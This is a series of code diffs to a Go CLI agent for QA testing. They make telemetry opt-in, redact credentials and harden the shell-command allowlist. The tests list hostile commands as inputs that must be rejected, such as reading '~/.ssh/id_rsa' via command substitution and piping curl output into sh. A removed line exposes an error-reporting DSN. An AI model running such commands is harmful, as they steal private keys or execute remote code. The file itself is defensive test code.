-	DefaultModel   string `json:"default_model,omitempty"`   // "auto", "sonnet", "opus", "haiku"
+	DefaultModel   string `json:"default_model,omitempty"` // "auto", "sonnet", "opus", "haiku"
 	DefaultProject int    `json:"default_project,omitempty"`
 	// DefaultFramework is set by the first-run wizard based on filesystem
 	// detection (Cargo.toml → rust_cargo, go.mod → go_test, etc.). The agent
 	// reads this to default the `framework` param on generate_test_code so
 	// Rust/Go users don't get Playwright scripts by accident.
 	DefaultFramework string `json:"default_framework,omitempty"` // "", "playwright", "pytest", "rust_cargo", "go_test"
-	Professional   bool   `json:"professional,omitempty"` // disable cat personality
-	AutoSave       bool   `json:"auto_save"`              // auto-save session on exit (default true)
-	MaxTokenBudget int    `json:"max_token_budget,omitempty"`
-	AnthropicKey string `json:"-"` // NOT stored in JSON — use keychain instead
+	Professional     bool   `json:"professional,omitempty"`      // disable cat personality
+	AutoSave         bool   `json:"auto_save"`                   // auto-save session on exit (default true)
+	MaxTokenBudget   int    `json:"max_token_budget,omitempty"`
+	AnthropicKey     string `json:"-"` // NOT stored in JSON — use keychain instead
 
-	// Ollama integration — use a self-hosted LLM for the cheap chat tier.
-	// When configured, iteration-0 (conversational) calls go to Ollama instead
-	// of Haiku, saving API costs. Tool orchestration stays on Claude.
-	OllamaURL        string `json:"ollama_url,omitempty"`         // e.g. "https://user:pass@llm.qualitymax.io"
+	// Ollama integration — use a self-hosted local model for chat and,
+	// optionally, tool dispatch.
+	OllamaURL        string `json:"ollama_url,omitempty"`         // e.g. "https://user:pass@llm.example.com"
 	OllamaModel      string `json:"ollama_model,omitempty"`       // e.g. "gemma3:4b-it-q4_K_M" (chat)
-	OllamaAgentModel string `json:"ollama_agent_model,omitempty"` // e.g. "gemma3:12b-it-q4_K_M" (tools, heavier tasks)
+	OllamaAgentModel string `json:"ollama_agent_model,omitempty"` // e.g. "gemma3:12b-it-q4_K_M" (tool dispatch)
 }
 
 const qmaxCodeConfigDir = ".qmax-code"

--- a/config_test.go
+++ b/config_test.go
@@ -18,6 +18,20 @@ func TestDefaultConfig(t *testing.T) {
 	}
 }
 
+func TestResolveModelUsesCentralModelConstants(t *testing.T) {
+	cases := map[string]string{
+		"haiku":  ModelHaiku,
+		"sonnet": ModelSonnet,
+		"opus":   ModelOpus,
+		"custom": "custom",
+	}
+	for input, want := range cases {
+		if got := resolveModel(input); got != want {
+			t.Errorf("resolveModel(%q) = %q, want %q", input, got, want)
+		}
+	}
+}
+
 func TestConfigSaveAndLoad(t *testing.T) {
 	origHome := os.Getenv("HOME")
 	tmpDir := t.TempDir()

--- a/error_reporting.go
+++ b/error_reporting.go
@@ -2,21 +2,35 @@ package main
 
 import (
 	"fmt"
+	"os"
+	"strings"
 	"time"
 
 	"github.com/getsentry/sentry-go"
 )
 
-const bugsinkDSN = "https://4a5a87da918c49d997ca431b1e666fc5@bugs.qualitymax.io/5"
+const (
+	telemetryEnabledEnv = "QMAX_CODE_TELEMETRY"
+	telemetryDSNEnv     = "QMAX_CODE_TELEMETRY_DSN"
+)
 
-// InitErrorReporting sets up Sentry/Bugsink error reporting.
+// InitErrorReporting sets up Sentry-compatible error reporting when explicitly
+// enabled. Public builds should not report anything unless the user opts in.
 func InitErrorReporting() {
+	if !envEnabled(telemetryEnabledEnv) {
+		return
+	}
+
+	dsn := os.Getenv(telemetryDSNEnv)
+	if dsn == "" {
+		return
+	}
+
 	err := sentry.Init(sentry.ClientOptions{
-		Dsn:              bugsinkDSN,
+		Dsn:              dsn,
 		Release:          fmt.Sprintf("qmax-code@%s", Version),
 		Environment:      "production",
 		AttachStacktrace: true,
-		// Don't send in debug/dev mode
 		BeforeSend: func(event *sentry.Event, hint *sentry.EventHint) *sentry.Event {
 			return event
 		},
@@ -27,6 +41,15 @@ func InitErrorReporting() {
 	}
 }
 
+func envEnabled(key string) bool {
+	switch strings.ToLower(os.Getenv(key)) {
+	case "1", "true", "yes", "on", "enabled":
+		return true
+	default:
+		return false
+	}
+}
+
 // FlushErrorReporting flushes pending events before exit.
 func FlushErrorReporting() {
 	sentry.Flush(2 * time.Second)
@@ -34,10 +57,13 @@ func FlushErrorReporting() {
 
 // CaptureError reports a non-fatal error to Bugsink.
 func CaptureError(err error, context map[string]interface{}) {
+	if err != nil {
+		err = fmt.Errorf("%s", redactSensitive(err.Error()))
+	}
 	if context != nil {
 		sentry.WithScope(func(scope *sentry.Scope) {
 			for k, v := range context {
-				scope.SetTag(k, fmt.Sprintf("%v", v))
+				scope.SetTag(k, redactSensitive(fmt.Sprintf("%v", v)))
 			}
 			sentry.CaptureException(err)
 		})
@@ -48,7 +74,7 @@ func CaptureError(err error, context map[string]interface{}) {
 
 // CaptureMessage reports an informational message to Bugsink.
 func CaptureMessage(msg string) {
-	sentry.CaptureMessage(msg)
+	sentry.CaptureMessage(redactSensitive(msg))
 }
 
 // RecoverPanic catches panics and reports them to Bugsink before re-panicking.

--- a/interactive_setup.go
+++ b/interactive_setup.go
@@ -366,7 +366,7 @@ func intVal2(m map[string]interface{}, key string) int {
 }
 
 // detectProjectFramework inspects the given directory and returns the
-// qa-rag-app-canonical framework name for the toolchain it detects.
+// QualityMax framework name for the toolchain it detects.
 // Returns "" when nothing recognizable is present. Priority:
 //   - Cargo.toml       → "rust_cargo"
 //   - go.mod           → "go_test"

--- a/main.go
+++ b/main.go
@@ -279,11 +279,11 @@ func main() {
 func resolveModel(m string) string {
 	switch strings.ToLower(m) {
 	case "sonnet":
-		return "claude-sonnet-4-20250514"
+		return ModelSonnet
 	case "opus":
-		return "claude-opus-4-20250514"
+		return ModelOpus
 	case "haiku":
-		return "claude-haiku-4-5-20251001"
+		return ModelHaiku
 	default:
 		return m
 	}
@@ -503,10 +503,10 @@ func runREPL(agent *Agent, quietMode bool) {
 			switch agent.ollamaMode {
 			case OllamaModeOff:
 				agent.ollamaMode = OllamaModeChat
-				term.PrintSystem(fmt.Sprintf("Ollama: CHAT mode (%s) — chat via Gemma, tools via Claude", agent.ollama.model))
+				term.PrintSystem(fmt.Sprintf("Ollama: CHAT mode (%s) — chat via local model, tools via Claude", agent.ollama.model))
 			case OllamaModeChat:
 				agent.ollamaMode = OllamaModeFull
-				term.PrintSystem(fmt.Sprintf("Ollama: FULL mode (%s) — everything via Gemma (no Claude)", agent.ollama.agentModel))
+				term.PrintSystem(fmt.Sprintf("Ollama: FULL mode (%s) — everything via local model (no Claude)", agent.ollama.agentModel))
 			case OllamaModeFull:
 				agent.ollamaMode = OllamaModeOff
 				term.PrintSystem("Ollama: OFF — all calls via Claude")

--- a/main.go
+++ b/main.go
@@ -22,7 +22,7 @@ func main() {
 	// Flags
 	projectID := flag.Int("project-id", 0, "Default project ID for this session")
 	model := flag.String("model", "", "Claude model: auto (haiku+sonnet), sonnet, opus, haiku, or full ID")
-	apiKey := flag.String("api-key", "", "Anthropic API key (or set ANTHROPIC_API_KEY)")
+	anthropicAPIKey := flag.String("anthropic-api-key", "", "Anthropic API key (or set ANTHROPIC_API_KEY)")
 	cloudURL := flag.String("cloud-url", "", "QualityMax cloud URL (or use qmax login)")
 	oneShot := flag.String("p", "", "Run a single prompt and exit (non-interactive)")
 	resumeID := flag.String("resume", "", "Resume a previous session by ID (or 'last')")
@@ -39,7 +39,7 @@ func main() {
 		return
 	}
 
-	// Initialize error reporting (Bugsink)
+	// Initialize error reporting only when explicitly enabled.
 	InitErrorReporting()
 	defer FlushErrorReporting()
 	defer RecoverPanic()
@@ -57,12 +57,17 @@ func main() {
 
 	// Handle "login" subcommand before flag parsing
 	if len(os.Args) > 1 && os.Args[1] == "login" {
+		loginFlags := flag.NewFlagSet("login", flag.ExitOnError)
+		qualityMaxAPIKey := loginFlags.String("api-key", "", "QualityMax API key")
+		_ = loginFlags.Parse(os.Args[2:])
+
 		var cfg *AuthConfig
 		var err error
-		if *apiKey != "" {
-			cfg, err = LoginWithAPIKey(*apiKey)
-		} else if len(os.Args) > 2 && strings.HasPrefix(os.Args[2], "qm-") {
-			cfg, err = LoginWithAPIKey(os.Args[2])
+		args := loginFlags.Args()
+		if *qualityMaxAPIKey != "" {
+			cfg, err = LoginWithAPIKey(*qualityMaxAPIKey)
+		} else if len(args) > 0 && strings.HasPrefix(args[0], "qm-") {
+			cfg, err = LoginWithAPIKey(args[0])
 		} else {
 			// Browser-based login (Railway-style)
 			AnimateMax(MoodWaving, "Let's get you logged in!")
@@ -70,7 +75,7 @@ func main() {
 		}
 		if err != nil {
 			AnimateMax(MoodSad, "Login failed: "+err.Error())
-			fmt.Fprintf(os.Stderr, "\n  Try: qmax-code login qm-YOUR-API-KEY\n")
+			fmt.Fprintf(os.Stderr, "\n  Try: qmax-code login --api-key qm-YOUR-API-KEY\n")
 			os.Exit(1)
 		}
 		AnimateMax(MoodHappy, fmt.Sprintf("Logged in as %s", cfg.Email))
@@ -110,7 +115,7 @@ func main() {
 	effectiveModel = resolveModel(effectiveModel)
 
 	// Resolve Anthropic API key: flag > env > keychain
-	anthropicKey := *apiKey
+	anthropicKey := *anthropicAPIKey
 	if anthropicKey == "" {
 		anthropicKey = os.Getenv("ANTHROPIC_API_KEY")
 	}

--- a/mcp_server.go
+++ b/mcp_server.go
@@ -136,11 +136,7 @@ func buildMCPToolList() []mcpToolDef {
 	defs := BuildToolDefs()
 	out := make([]mcpToolDef, len(defs))
 	for i, d := range defs {
-		out[i] = mcpToolDef{
-			Name:        d.Name,
-			Description: d.Description,
-			InputSchema: d.InputSchema,
-		}
+		out[i] = mcpToolDef(d)
 	}
 	return out
 }

--- a/ollama.go
+++ b/ollama.go
@@ -14,14 +14,13 @@ import (
 	"time"
 )
 
-// Ollama integration — use a self-hosted LLM for the cheap chat tier.
+// Ollama integration — use a self-hosted local model for chat and,
+// optionally, tool dispatch.
 // Ollama exposes an OpenAI-compatible /v1/chat/completions endpoint.
-// We use it for simple conversational responses (iteration 0) while
-// keeping Claude for tool orchestration.
 
 // OllamaClient wraps HTTP calls to an Ollama instance with a circuit breaker.
 type OllamaClient struct {
-	baseURL    string // e.g. "https://user:pass@llm.qualitymax.io"
+	baseURL    string // e.g. "https://user:pass@llm.example.com"
 	model      string // e.g. "gemma3:4b-it-q4_K_M" (fast, for chat)
 	agentModel string // e.g. "gemma3:12b-it-q4_K_M" (smarter, for tool dispatch)
 	http       *http.Client

--- a/ollama_agent.go
+++ b/ollama_agent.go
@@ -8,16 +8,16 @@ import (
 )
 
 // OllamaAgentMode provides a full Ollama-powered agent that handles both
-// chat AND tool-needing requests. Since Gemma doesn't support native
-// function calling, we use prompt-based tool dispatch:
+// chat AND tool-needing requests. Since many local models don't support native
+// function calling, qmax-code uses prompt-based tool dispatch:
 //
-// 1. Gemma classifies user intent into an action + params
+// 1. The local model classifies user intent into an action + params
 // 2. Go code maps the action to an actual QualityMax API call
-// 3. Results are fed back to Gemma for formatting
+// 3. Results are fed back to the local model for formatting
 //
 // This allows qmax-code to run entirely on the self-hosted GPU.
 
-// ollamaToolActions is the compact action set Gemma can choose from.
+// ollamaToolActions is the compact action set the local model can choose from.
 // Each maps to one or more real QualityMax API calls.
 const ollamaToolPrompt = `
 
@@ -56,7 +56,7 @@ func (a *Agent) RunOllamaAgent(term *Terminal) (string, bool) {
 	ctx1, cancel1 := context.WithCancel(context.Background())
 	a.cancel = cancel1
 
-	// Phase 1: Get Gemma's response (may contain <action> block)
+	// Phase 1: Get the local model response (may contain <action> block)
 	// Use the agent model (12B) for better tool dispatch accuracy
 	ollamaText, err := a.ollama.ChatStreamingWithModel(ctx1, a.ollama.agentModel, system, a.history, term)
 	a.cancel = nil
@@ -90,8 +90,7 @@ func (a *Agent) RunOllamaAgent(term *Terminal) (string, bool) {
 	toolResult := a.executeOllamaAction(action, params, apiCtx)
 	term.PrintToolResult(action, truncateStr(toolResult, 200))
 
-	// Phase 3: Feed results back to Gemma for formatting
-	// Build a follow-up asking Gemma to present the results
+	// Phase 3: Feed results back to the local model for formatting.
 	a.history = append(a.history, Message{
 		Role:    "assistant",
 		Content: []ContentBlock{{Type: "text", Text: remaining}},
@@ -120,7 +119,7 @@ func (a *Agent) RunOllamaAgent(term *Terminal) (string, bool) {
 	return summary, true
 }
 
-// parseActionBlock extracts an action from Gemma's response.
+// parseActionBlock extracts an action from the local model response.
 // Supports both <action>{...}</action> tags and bare JSON with "name" field.
 // Returns the action name, params map, and any text outside the action block.
 func parseActionBlock(text string) (string, map[string]interface{}, string) {
@@ -141,7 +140,7 @@ func parseActionBlock(text string) (string, map[string]interface{}, string) {
 	}
 
 	// Fallback: look for bare JSON with "name" field anywhere in the text.
-	// Gemma sometimes outputs {"name": "list_projects", "params": {}} without tags.
+	// Local models sometimes output {"name": "list_projects", "params": {}} without tags.
 	jsonStart := strings.Index(text, `{"name"`)
 	if jsonStart == -1 {
 		jsonStart = strings.Index(text, `{ "name"`)
@@ -238,7 +237,7 @@ func (a *Agent) executeOllamaAction(action string, params map[string]interface{}
 	}
 }
 
-// truncateToolResult keeps tool output to a reasonable size for Gemma's context.
+// truncateToolResult keeps tool output to a reasonable size for local model context.
 func truncateToolResult(result string) string {
 	const maxLen = 4000
 	if len(result) <= maxLen {

--- a/security.go
+++ b/security.go
@@ -39,7 +39,12 @@ var sensitivePatterns = []struct {
 	{regexp.MustCompile(`sk-ant-[A-Za-z0-9_-]+`), "sk-ant-[REDACTED]"},
 	{regexp.MustCompile(`qm-[A-Za-z0-9_-]+`), "qm-[REDACTED]"},
 	{regexp.MustCompile(`(?i)(bearer\s+)[A-Za-z0-9._~+/=-]+`), "${1}[REDACTED]"},
-	{regexp.MustCompile(`(?i)("?(?:api[_-]?key|token|anthropic[_-]?key)"?\s*[:=]\s*)"?[^"',\s}]+`), `${1}"[REDACTED]"`},
+	// Quoted values: consume both quotes so we don't leave a dangling closing
+	// quote behind. Must run before the unquoted variant.
+	{regexp.MustCompile(`(?i)("?(?:api[_-]?key|token|anthropic[_-]?key)"?\s*[:=]\s*)"[^"]*"`), `${1}"[REDACTED]"`},
+	// Unquoted values: no quote in, no quote out — preserves shape in
+	// shell/env/log lines (`token=abc` should not become `token="[REDACTED]"`).
+	{regexp.MustCompile(`(?i)("?(?:api[_-]?key|token|anthropic[_-]?key)"?\s*[:=]\s*)[^"',\s}]+`), `${1}[REDACTED]`},
 }
 
 // redactSensitive removes common credential shapes before text is shown,

--- a/security.go
+++ b/security.go
@@ -277,34 +277,31 @@ func parseQmaxAllows(code string) map[string]bool {
 	return allows
 }
 
-// Command allowlist — only these command prefixes are safe
-var allowedCommands = []string{
-	"git ",
-	"git\t",
-	"ls ",
-	"ls\t",
-	"ls\n",
-	"pwd",
-	"cat ",
-	"head ",
-	"tail ",
-	"wc ",
-	"find ",
-	"grep ",
-	"npm ",
-	"npx ",
-	"node ",
-	"go ",
-	"python ",
-	"python3 ",
-	"pip ",
-	"echo ",
-	"which ",
-	"env",
-	"uname",
-	"date",
-	"whoami",
-	"qmax ",
+// Command allowlist — only these executable names are available to run_command.
+var allowedCommands = map[string]bool{
+	"git":     true,
+	"ls":      true,
+	"pwd":     true,
+	"cat":     true,
+	"head":    true,
+	"tail":    true,
+	"wc":      true,
+	"find":    true,
+	"grep":    true,
+	"npm":     true,
+	"npx":     true,
+	"node":    true,
+	"go":      true,
+	"python":  true,
+	"python3": true,
+	"pip":     true,
+	"echo":    true,
+	"which":   true,
+	"env":     true,
+	"uname":   true,
+	"date":    true,
+	"whoami":  true,
+	"qmax":    true,
 }
 
 // Dangerous shell operators that should be blocked
@@ -327,6 +324,18 @@ var dangerousShellOps = []string{
 	":(){ ", // fork bomb
 }
 
+var blockedShellTokens = []string{
+	";",
+	"&&",
+	"||",
+	"|",
+	"$(",
+	"`",
+	">",
+	"<",
+	"\n",
+}
+
 // validateCommand checks if a shell command is safe to execute.
 // Returns empty string if safe, or reason if blocked.
 func validateCommand(cmd string) string {
@@ -344,18 +353,17 @@ func validateCommand(cmd string) string {
 			return fmt.Sprintf("dangerous operation: %s", dangerous)
 		}
 	}
-
-	// Check against allowlist
-	// The command must start with one of the allowed prefixes
-	allowed := false
-	for _, prefix := range allowedCommands {
-		if strings.HasPrefix(cmd, prefix) || cmd == strings.TrimSpace(prefix) {
-			allowed = true
-			break
+	for _, token := range blockedShellTokens {
+		if strings.Contains(cmd, token) {
+			return fmt.Sprintf("shell control token not allowed: %s", token)
 		}
 	}
 
-	if !allowed {
+	fields := strings.Fields(cmd)
+	if len(fields) == 0 {
+		return "empty command"
+	}
+	if !allowedCommands[fields[0]] {
 		return "command not in allowlist. Allowed: git, ls, cat, npm, npx, node, go, python, qmax, etc."
 	}
 

--- a/security.go
+++ b/security.go
@@ -2,6 +2,7 @@ package main
 
 import (
 	"fmt"
+	"net/url"
 	"regexp"
 	"strings"
 )
@@ -28,6 +29,47 @@ var dangerousPatterns = []struct {
 	{regexp.MustCompile(`exec\s*\(|execSync\s*\(`), "exec/execSync — shell command execution"},
 	{regexp.MustCompile(`spawn\s*\(|spawnSync\s*\(`), "spawn — process spawning"},
 	{regexp.MustCompile(`globalThis|global\[`), "global scope manipulation"},
+}
+
+var sensitivePatterns = []struct {
+	pattern     *regexp.Regexp
+	replacement string
+}{
+	{regexp.MustCompile(`(https?://)([^/\s:@]+):([^@\s/]+)@`), "${1}${2}:[REDACTED]@"},
+	{regexp.MustCompile(`sk-ant-[A-Za-z0-9_-]+`), "sk-ant-[REDACTED]"},
+	{regexp.MustCompile(`qm-[A-Za-z0-9_-]+`), "qm-[REDACTED]"},
+	{regexp.MustCompile(`(?i)(bearer\s+)[A-Za-z0-9._~+/=-]+`), "${1}[REDACTED]"},
+	{regexp.MustCompile(`(?i)("?(?:api[_-]?key|token|anthropic[_-]?key)"?\s*[:=]\s*)"?[^"',\s}]+`), `${1}"[REDACTED]"`},
+}
+
+// redactSensitive removes common credential shapes before text is shown,
+// returned to the agent, or sent to optional telemetry.
+func redactSensitive(text string) string {
+	if text == "" {
+		return ""
+	}
+	redacted := text
+	for _, sp := range sensitivePatterns {
+		redacted = sp.pattern.ReplaceAllString(redacted, sp.replacement)
+	}
+	return redactURLCredentials(redacted)
+}
+
+func redactURLCredentials(text string) string {
+	fields := strings.Fields(text)
+	for _, field := range fields {
+		trimmed := strings.Trim(field, `"'(),[]{}<>`)
+		if !strings.Contains(trimmed, "://") {
+			continue
+		}
+		u, err := url.Parse(trimmed)
+		if err != nil || u.User == nil {
+			continue
+		}
+		u.User = url.UserPassword(u.User.Username(), "[REDACTED]")
+		text = strings.ReplaceAll(text, trimmed, u.String())
+	}
+	return text
 }
 
 // detectLanguage returns one of "js" (Playwright/Jest/Cypress), "go",
@@ -210,8 +252,10 @@ func scanCodeSecurity(code string) []string {
 // `// qmax:allow=<rule>` (case-insensitive on the `qmax:allow` part,
 // case-sensitive on the rule name to avoid surprises). Multiple rules
 // can be granted on separate lines or comma-separated:
-//   // qmax:allow=os/exec
-//   // qmax:allow=os/exec, exec.Command
+//
+//	// qmax:allow=os/exec
+//	// qmax:allow=os/exec, exec.Command
+//
 // Only `//`-style line comments are recognized — block comments are
 // intentionally ignored to keep the marker visible to grep + reviewers.
 var qmaxAllowRE = regexp.MustCompile(`(?i)//\s*qmax:allow=([^\r\n]+)`)

--- a/security_test.go
+++ b/security_test.go
@@ -105,6 +105,37 @@ url=https://user:pass@llm.example.com/v1`
 	}
 }
 
+// TestRedactSensitivePreservesShape locks down the *exact* redacted line —
+// not a substring — because a substring check passes for `api_key="[REDACTED]""`
+// (note the stray trailing quote), which is the bug shape this guards against.
+func TestRedactSensitivePreservesShape(t *testing.T) {
+	cases := []struct {
+		name, in, want string
+	}{
+		// Bug A regression: quoted value must not leave a dangling closing quote.
+		{"quoted_qm", `api_key="qm-live-secret"`, `api_key="[REDACTED]"`},
+		{"quoted_sk_ant", `token: "sk-ant-supersecret"`, `token: "[REDACTED]"`},
+		// Bug B regression: unquoted value must stay unquoted.
+		{"unquoted_token", `token=abc123`, `token=[REDACTED]`},
+		{"unquoted_api_key", `api_key=qm-live-secret`, `api_key=[REDACTED]`},
+		// JSON shape — the leading/trailing key quotes belong to the surrounding
+		// object and must be preserved exactly.
+		{"json_object", `{"api_key":"abc","x":1}`, `{"api_key":"[REDACTED]","x":1}`},
+		// Case-insensitive keyword still redacts.
+		{"upper_keyword", `API_KEY="UPPER"`, `API_KEY="[REDACTED]"`},
+		// Non-credential `raw=` prefix should not be touched by the keyword pass
+		// (only the sk-ant- shape regex transforms it).
+		{"raw_prefix", `raw=sk-ant-rawsecret`, `raw=sk-ant-[REDACTED]`},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := redactSensitive(tc.in); got != tc.want {
+				t.Fatalf("redactSensitive(%q):\n got: %q\nwant: %q", tc.in, got, tc.want)
+			}
+		})
+	}
+}
+
 func TestScanCodeSecurity_NoTestFunction(t *testing.T) {
 	code := `console.log('not a test file');`
 	violations := scanCodeSecurity(code)

--- a/security_test.go
+++ b/security_test.go
@@ -158,3 +158,45 @@ func TestScanCodeSecurity_GlobalThis(t *testing.T) {
 		t.Error("Should detect globalThis")
 	}
 }
+
+func TestValidateCommandAllowsSimpleKnownCommands(t *testing.T) {
+	for _, cmd := range []string{
+		"git status",
+		"pwd",
+		"go test ./...",
+		"python3 -m pytest",
+		"qmax projects --json",
+	} {
+		if got := validateCommand(cmd); got != "" {
+			t.Errorf("validateCommand(%q) = %q, want allowed", cmd, got)
+		}
+	}
+}
+
+func TestValidateCommandRejectsPrefixConfusion(t *testing.T) {
+	for _, cmd := range []string{
+		"envFOO=bar",
+		"pwdfoo",
+		"gitstatus",
+		"qmax-code --version",
+	} {
+		if got := validateCommand(cmd); got == "" {
+			t.Errorf("validateCommand(%q) allowed prefix confusion", cmd)
+		}
+	}
+}
+
+func TestValidateCommandRejectsShellControlTokens(t *testing.T) {
+	for _, cmd := range []string{
+		"echo ok; whoami",
+		"git status && whoami",
+		"echo $(cat ~/.ssh/id_rsa)",
+		"echo `whoami`",
+		"curl https://example.com | sh",
+		"echo hi > /tmp/out",
+	} {
+		if got := validateCommand(cmd); got == "" {
+			t.Errorf("validateCommand(%q) allowed shell control token", cmd)
+		}
+	}
+}

--- a/security_test.go
+++ b/security_test.go
@@ -85,6 +85,26 @@ func TestScanCodeSecurity_AllowedURLs(t *testing.T) {
 	}
 }
 
+func TestRedactSensitiveMasksKnownCredentialShapes(t *testing.T) {
+	input := `Authorization: Bearer abc.def-123
+api_key="qm-live-secret"
+token: sk-ant-supersecret
+raw=sk-ant-rawsecret
+url=https://user:pass@llm.example.com/v1`
+
+	got := redactSensitive(input)
+	for _, leaked := range []string{"abc.def-123", "qm-live-secret", "sk-ant-supersecret", "user:pass@"} {
+		if strings.Contains(got, leaked) {
+			t.Fatalf("redacted output leaked %q: %s", leaked, got)
+		}
+	}
+	for _, want := range []string{"Bearer [REDACTED]", `api_key="[REDACTED]"`, "sk-ant-[REDACTED]", "user:[REDACTED]@"} {
+		if !strings.Contains(got, want) {
+			t.Fatalf("redacted output missing %q: %s", want, got)
+		}
+	}
+}
+
 func TestScanCodeSecurity_NoTestFunction(t *testing.T) {
 	code := `console.log('not a test file');`
 	violations := scanCodeSecurity(code)

--- a/tools.go
+++ b/tools.go
@@ -489,6 +489,7 @@ func BuildToolDefs() []ToolDef {
 				prop("create_project", "boolean", "Create a new project for this repo", false),
 				prop("project_name", "string", "Name for the new project", false),
 				prop("base_url", "string", "Base URL for testing", false),
+				prop("training_consent", "string", "Optional explicit consent value: opt_in or opt_out. Omit if the user has not chosen.", false),
 			)),
 		},
 		{
@@ -661,7 +662,7 @@ func executeToolViaAPI(name string, rawInput interface{}, sctx *SessionContext, 
 
 	case "import_repo":
 		return api.ImportRepo(ctx, strVal(input, "url"), intVal(input, "project_id", sctx.ProjectID),
-			boolVal(input, "create_project"), strVal(input, "project_name"), strVal(input, "base_url"))
+			boolVal(input, "create_project"), strVal(input, "project_name"), strVal(input, "base_url"), strVal(input, "training_consent"))
 
 	case "import_document":
 		return api.ImportDocument(ctx, intVal(input, "project_id", sctx.ProjectID), strVal(input, "text"), strVal(input, "source_name"))
@@ -839,15 +840,13 @@ func min(a, b int) int {
 	return b
 }
 
-// runLocalTest downloads a script from QualityMax and runs it — where "runs"
-// depends on the script's framework:
+// runLocalTest downloads a script from QualityMax and runs it. Execution
+// location depends on the script's framework:
 //
 //	pytest / playwright → executed LOCALLY (pytest/npx on the user's machine)
-//	rust_cargo / go_test → delegated to the QualityMax SERVER runner, because
+//	rust_cargo / go_test → delegated to the QualityMax execution API because
 //	  scaffolding a Cargo.toml / go.mod and running cargo/go locally is
-//	  toolchain-heavy and duplicates what services/native_test_execution_service.py
-//	  already does. The `case "rust_cargo", ...` branch below calls
-//	  sctx.API.RunNativeTest which POSTs /api/automation/execute.
+//	  toolchain-heavy.
 //
 // The function name reads as "local" but for native toolchains it transparently
 // falls back to remote. This is intentional — the agent's tool-call surface
@@ -928,8 +927,7 @@ func runLocalTest(ctx context.Context, sctx *SessionContext, scriptID int, baseU
 	case "rust_cargo", "rust", "cargo", "go_test", "go":
 		// Native (Rust/Go) scripts are toolchain-heavy and need a scaffolded
 		// Cargo.toml / go.mod to build. Rather than duplicate that logic
-		// client-side, delegate to the server runner via run_native_test —
-		// the backend already has the full cargo/go scaffolding pipeline.
+		// client-side, delegate to the QualityMax execution API.
 		return sctx.API.RunNativeTest(ctx, scriptID, baseURL)
 
 	default:
@@ -937,12 +935,11 @@ func runLocalTest(ctx context.Context, sctx *SessionContext, scriptID int, baseU
 			"Framework '%s' not supported for local execution. "+
 				"Supported locally: pytest, playwright. "+
 				"For rust_cargo/go_test scripts, use the run_native_test tool — "+
-				"it runs on the QualityMax server runner which ships the full "+
-				"cargo + rustc toolchain and a Go 1.22+ module cache. "+
+				"it runs through the QualityMax execution API. "+
 				"(Local execution of those frameworks would require us to "+
 				"scaffold a Cargo.toml / go.mod per run, plus download a few "+
 				"hundred MB of dependencies on your machine — running on the "+
-				"server is faster and avoids polluting your local $GOPATH / "+
+				"managed runner is faster and avoids polluting your local $GOPATH / "+
 				"$CARGO_HOME.)",
 			framework,
 		))
@@ -964,9 +961,9 @@ func runLocalTest(ctx context.Context, sctx *SessionContext, scriptID int, baseU
 
 	// 4. Build result
 	passed := runErr == nil
-	output := stdout.String()
+	output := redactSensitive(stdout.String())
 	if stderr.Len() > 0 {
-		output += "\n--- stderr ---\n" + stderr.String()
+		output += "\n--- stderr ---\n" + redactSensitive(stderr.String())
 	}
 
 	// Trim output if too long
@@ -1222,14 +1219,14 @@ func runQMax(sctx *SessionContext, ctx context.Context, args ...string) string {
 			return `{"error": "cancelled"}`
 		}
 		if stderr.Len() > 0 {
-			return fmt.Sprintf(`{"error": %q}`, stderr.String())
+			return fmt.Sprintf(`{"error": %q}`, redactSensitive(stderr.String()))
 		}
-		return fmt.Sprintf(`{"error": %q}`, err.Error())
+		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
 	}
 
-	output := strings.TrimSpace(stdout.String())
+	output := strings.TrimSpace(redactSensitive(stdout.String()))
 	if output == "" {
-		output = strings.TrimSpace(stderr.String())
+		output = strings.TrimSpace(redactSensitive(stderr.String()))
 	}
 	return output
 }
@@ -1247,12 +1244,12 @@ func runShell(ctx context.Context, name string, args ...string) string {
 		}
 		combined := stdout.String() + stderr.String()
 		if combined != "" {
-			return truncateOutput(combined, 8000)
+			return truncateOutput(redactSensitive(combined), 8000)
 		}
-		return fmt.Sprintf(`{"error": %q}`, err.Error())
+		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
 	}
 
-	return truncateOutput(stdout.String(), 8000)
+	return truncateOutput(redactSensitive(stdout.String()), 8000)
 }
 
 // truncateOutput limits output to maxLen characters.
@@ -1894,20 +1891,20 @@ func fetchScriptCode(sctx *SessionContext, ctx context.Context, scriptID string)
 	url := fmt.Sprintf("%s/api/automation/scripts/%s", apiURL, scriptID)
 	req, err := http.NewRequestWithContext(ctx, "GET", url, nil)
 	if err != nil {
-		return fmt.Sprintf(`{"error": %q}`, err.Error())
+		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
 	}
 	req.Header.Set("Authorization", "Bearer "+token)
 
 	client := &http.Client{Timeout: 30 * time.Second}
 	resp, err := client.Do(req)
 	if err != nil {
-		return fmt.Sprintf(`{"error": %q}`, err.Error())
+		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
 	}
 	defer resp.Body.Close()
 
 	body, _ := io.ReadAll(io.LimitReader(resp.Body, 1024*1024))
 	if resp.StatusCode != 200 {
-		return fmt.Sprintf(`{"error": "HTTP %d: %s"}`, resp.StatusCode, string(body))
+		return fmt.Sprintf(`{"error": "HTTP %d: %s"}`, resp.StatusCode, redactSensitive(string(body)))
 	}
 	return string(body)
 }
@@ -1928,7 +1925,7 @@ func updateScriptCode(sctx *SessionContext, ctx context.Context, scriptID, name,
 
 	req, err := http.NewRequestWithContext(ctx, "PUT", url, bytes.NewReader(payload))
 	if err != nil {
-		return fmt.Sprintf(`{"error": %q}`, err.Error())
+		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
 	}
 	req.Header.Set("Authorization", "Bearer "+token)
 	req.Header.Set("Content-Type", "application/json")
@@ -1936,13 +1933,13 @@ func updateScriptCode(sctx *SessionContext, ctx context.Context, scriptID, name,
 	client := &http.Client{Timeout: 30 * time.Second}
 	resp, err := client.Do(req)
 	if err != nil {
-		return fmt.Sprintf(`{"error": %q}`, err.Error())
+		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
 	}
 	defer resp.Body.Close()
 
 	body, _ := io.ReadAll(io.LimitReader(resp.Body, 1024*1024))
 	if resp.StatusCode != 200 {
